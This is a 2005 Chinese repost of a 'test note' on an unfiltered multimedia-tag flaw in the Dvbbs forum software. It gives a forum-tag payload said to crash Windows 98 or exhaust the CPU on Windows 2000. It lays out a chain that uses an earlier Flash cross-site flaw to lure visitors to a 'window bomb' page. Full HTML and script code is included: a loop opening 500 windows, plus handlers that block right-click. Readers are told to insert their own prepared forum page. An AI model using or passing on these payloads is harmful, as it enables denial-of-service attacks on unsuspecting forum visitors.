|
|
动网论坛多媒体标签未过滤漏洞 |
|
|
作者:未知 来源:月光软件站 加入时间:2005-2-28 月光软件站 |
动网论坛多媒体标签未过滤漏洞测试手记 今天在剑鹰看到这个漏洞的说明,就想测试一下,先找了个动网论坛,发贴的内容如下: {mp=0,0}c:\ddos.rmi{/mp} ..........省去一部分。代码中记得把{}换成[] 经过测试,当贴中包含大概40个这样的语句时,就可以让WIN98内存耗尽而蓝屏。 对于WIN2000可以使CPU使用率达到满负荷,即使及时关掉IE的进程,系统仍然会出现一些不正常的现象,如右键菜单无法正常显示等。 再深入发展一下,结合动网前一段时间可以在FLASH中插入URL来跨站攻击的漏洞,如果我们在FLASH中制向的是我们特制的一个HTML页面,进入后会弹出N个包含了{mp=0,0}c:\ddos.rmi{/mp}语句的动网页面,就可以大大加强炸弹的威力(这么多进程你关那个啊,呵呵~~~) 攻击过程: 在一个动网发一个插入了非法的多媒体标签的帖子----做一个窗口炸弹的HTML页面,将URL指向插入了多媒体标签的动网页面-----将窗口炸弹的HTML页面的URL插入FLASH中---将FLASH发到目标论坛上??????????//这样别人访问了这个插入了FLASH的贴就中招了~~~~ 以下是HTML的代码: html> <head> <title>窗口炸弹</title> </head> <body> <script language="jav*script">for(g=0;g<500;g++){window.open("www.cbhu.net")}</script> <p><!--webbot bot="HTMLMarkup" startspan --><html> <head> </head> <body> <script language="JavaScript"> <!-- if (window.Event) document.captureEvents(Event.MOUSEUP); function nocontextmenu() { event.cancelBubble = true event.returnValue = false; return false; } function norightclick(e) { if (window.Event) { if (e.which == 2 || e.which == 3) return false; } else if (event.button == 2 || event.button == 3) { event.cancelBubble = true event.returnValue = false; return false; } } document.oncontextmenu = nocontextmenu;??// for IE5+ document.onmousedown = norightclick;??// for all others //--> </script> </body> </html><!--webbot bot="HTMLMarkup" endspan --> </p> </body> </html> ~~~~~~~~~~~~~~~END~~~~~~~~~~~~~~~~~ <script language="jav*script">for(g=0;g<500;g++){window.open("www.cbhu.net")}</script> 把这句中的www.cbhu.net换成你发准备好的插入了多媒体标签的动网页面就可以了~~ 此文仅做为技术讨论之列,如果用于恶意破坏,后果将由你自来承担!!

|
|
相关文章:相关软件: |
|